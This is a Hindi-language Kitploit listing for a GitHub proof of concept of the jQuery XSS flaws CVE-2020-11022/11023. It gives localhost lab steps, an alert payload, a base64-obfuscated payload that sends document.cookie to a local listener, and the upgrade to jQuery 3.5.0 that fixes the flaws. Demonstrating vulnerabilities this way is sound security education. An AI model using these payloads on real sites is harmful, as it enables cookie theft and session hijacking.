Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-11022-CVE-2020-11023 — इस CVE को प्रदर्शित करने के लिए जल्दी से तैयार की गई एक छोटी सी चीज़। | Kitploit
उपकरण/GitHubGitHub/0xaj2k/cve-2020-11022-cve-2020-11023
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षा
GitHub0xaj2k/cve-2020-11022-cve-2020-11023

CVE-2020-11022-CVE-2020-11023

इस CVE को प्रदर्शित करने के लिए जल्दी से तैयार की गई एक छोटी सी चीज़।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
354124 साल पहलेKitploit द्वारा समीक्षित

CVE-2020-11022 CVE-2020-11023

jQuery के 1.2 और उससे ऊपर तथा 3.5.0 से पहले के संस्करणों में, अविश्वसनीय स्रोतों से HTML को—सैनिटाइज़ करने के बाद भी—jQuery की DOM मैनिपुलेशन विधियों (जैसे .html(), .append() और अन्य) में पास करने पर अविश्वसनीय कोड निष्पादित हो सकता है। यह समस्या jQuery 3.5.0 में ठीक कर दी गई है।

jQuery के 1.0.3 और उससे ऊपर तथा 3.5.0 से पहले के संस्करणों में, अविश्वसनीय स्रोतों से तत्वों वाले HTML को—सैनिटाइज़ करने के बाद भी—jQuery की DOM मैनिपुलेशन विधियों (जैसे .html(), .append() और अन्य) में पास करने पर अविश्वसनीय कोड निष्पादित हो सकता है। यह समस्या jQuery 3.5.0 में ठीक कर दी गई है।

शोषण (Exploit)

  1. PHP वेबसर्वर पर index.php पेज होस्ट करें। मैं sudo php -S 127.0.0.1:80 का उपयोग करके तुरंत सर्वर चालू करने का सुझाव देता हूँ।

सरल XSS

  1. पथ http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=alert(1)%3E पर जाएँ।
  2. "Append via .html()" बटन दबाएँ।
  3. अलर्ट पॉप-अप देखें।

चित्र

कुकी चोरी

  1. पोर्ट 8085 पर एक और वेबसर्वर शुरू करें, मैं इसके लिए Python का उपयोग करने का सुझाव देता हूँ: sudo python3 -m http.server 8085
  2. पथ http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=eval(atob(%27ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly8xMjcuMC4wLjE6ODA4NS8/Yz0iK2RvY3VtZW50LmNvb2tpZQ==%27))%3E पर जाएँ।
  3. "Append via .html()" बटन दबाएँ।
  4. Python लॉग जाँचें और उसमें अपनी कुकी देखें।

चित्र

समाधान (Fix)

अगर आप इस स्क्रिप्ट में इस CVE को ठीक करना चाहते हैं, तो बस jQuery संस्करण को https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.js में बदल दें :)

टूल डाउनलोड करें